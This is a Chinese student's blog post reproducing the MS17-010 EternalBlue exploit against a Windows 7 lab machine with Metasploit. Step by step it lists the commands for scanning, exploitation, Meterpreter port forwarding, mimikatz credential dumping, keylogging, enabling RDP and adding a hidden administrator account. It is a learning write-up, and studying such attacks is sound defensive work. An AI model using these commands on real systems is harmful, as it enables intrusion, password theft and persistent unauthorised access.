ms17-010(永恒之蓝漏洞复现)

✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :HW-2023-漏洞复现
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。


一、原理

永恒之蓝漏洞简介:

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers (影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows 系统的SMB漏洞可以获取系统最高权限。
5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
黑客利用永恒之蓝工具成功利用漏洞攻击电脑获取系统最高权限执行勒索病毒程序。(自动化)

445端口简介:

445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉! 2017年10月,由于病毒"坏兔子"(勒索病毒)来袭,国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445和139端口 。

二、实验环境

靶机win7
ip地址:192.168.204.160
登录密码:123456
攻击机:kail linux
ip地址:192.168.204.128

三、漏洞复现

Step1:启动msf

msfconsole
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Hb74o3Xh-1676285655630)(https://secure2.wostatic.cn/static/emGAG5LEipvjvtHmRh6kgL/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-uQL9trX71BBzQatewsBXAX-0-fe0a6c1cd8a93d949dbbc4f92d9bfcc2#id=Sok7T&originHeight=433&originWidth=898&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

Step2:搜索search ms17-010模块

search ms17-010
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-du7MfcgE-1676285655630)(https://secure2.wostatic.cn/static/9C6mZfubKQvfYn2kjLhgwa/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-xuhCvd9MMXPS6fBioTjPE5-0-20ee99ed7ccb4a37cabcce32fc3f1dd0#id=mIgrk&originHeight=435&originWidth=901&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

  • 其中的两个模块
    • auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞
    • exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击
Step3:使用辅助模块扫描是否存在永恒之蓝漏洞

use 3
show options
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iYTMQZQz-1676285655631)(https://secure2.wostatic.cn/static/61QwQZENmGTPJziu7yYvJi/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-qgB2S6L9zPGXmbXy5M8Ra3-0-dfe02610553a95afe52cccc13c33d7c2#id=giG9c&originHeight=438&originWidth=897&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

设置RHOST并扫描
set rhost 192.168.204.160
run
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WJH98izn-1676285655632)(https://secure2.wostatic.cn/static/8RgLZnipfjf1VkZf9t5rLt/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-kXCWvUcZyKHE9YXMFu2Piw-0-71d9b3f436eee206f0470925bdeb8911#id=l64yX&originHeight=439&originWidth=900&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

【+】是模块返回的信息,【*】是框架返回的信息

Step4:使用攻击模块

use 0
show options
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lNoBnukL-1676285655632)(https://secure2.wostatic.cn/static/fM27vbdr77ghHiUEnt6T2q/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-8nDiVh6QZtKwrLydi8GAPK-0-e3482fbceb393d6e8c5cfba7c96c46cf#id=BqvFR&originHeight=632&originWidth=968&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

设置RHOST并执行
set rhost 192.168.204.160
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wZrDrJKB-1676285655634)(https://secure2.wostatic.cn/static/wbAWRdbXC3FfcZoP8692BM/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-fqiU4ABtKa5diqAZwTCs4Q-0-26b4f1c784bc71d209707441390a54d5#id=i3BGq&originHeight=890&originWidth=1178&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

Step5:查看本机信息

ipconfig
ps 看浏览器或者记事本等进程号
migrate转到相应的进程

Step6:端口转发

portfwd命令是meterpreter内嵌的端口转发器,一般在目标主机开放的端口不允许直接访问的情况下使用,比如说,目标主机开放的远程桌面3389端口只允许内网访问,这时可以使用portfwd命令进行端口转发,以达到直接访问目标主机的目的。portf
wd的帮助信息如下:
portfwd add -l 1234 -r 192.168.204.160 -p 80

解释,假如目标主机192.168.204.160开放了一个网站,端口80,正常访问是 192.168.204.160:80, 端口转发之后,我们自己的电脑就可以用 127.0.0.1:1234 来访问目标网站

portfwd add -l 1235 -r 192.168.204.160 -p 3389
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RAaCH15O-1676285655635)(https://secure2.wostatic.cn/static/4r4neqbqVCE9vpSMu7PnRN/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-ioasZ1XpxUrWvnv6kH47k1-0-2b21e71ae9123049a47b90aa307df0f0#id=n6J97&originHeight=132&originWidth=509&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

Step7:获取屏幕数据

screenshot

Step8:获取密码

使用 mimikatz 插件
load mimikatz
creds_all
load kiwi # 没用到
wdigest #没用到

Step9:键盘监听

(没成功)
(1) keyscan_start: 启动时与如 Word 或浏览器的进程相关联的键盘记录软件
(2) keyscan_dump 键盘记录软件的内容转储,此时可以看到刚刚在靶机上输入的内容
(3) keyscan_stop: -停止键盘记录软件

step10:开启远程

(1)run post/windows/manage/enable_rdp 或 run getgui -e
利用此后渗透模块即可直接开启远程桌面
(2)KaliLinux操作系统中的rdesktop 靶机地址 命令即可直接使用root账号登录到靶机系统中
(3)在msf软件里run vnc 或者新建终端 rdesktop 目标IP

Step11:进入cmd添加用户

shell
net user admin 123456 /add
net localgroup administrators 用户名 /add

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

就你叫Martin?

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值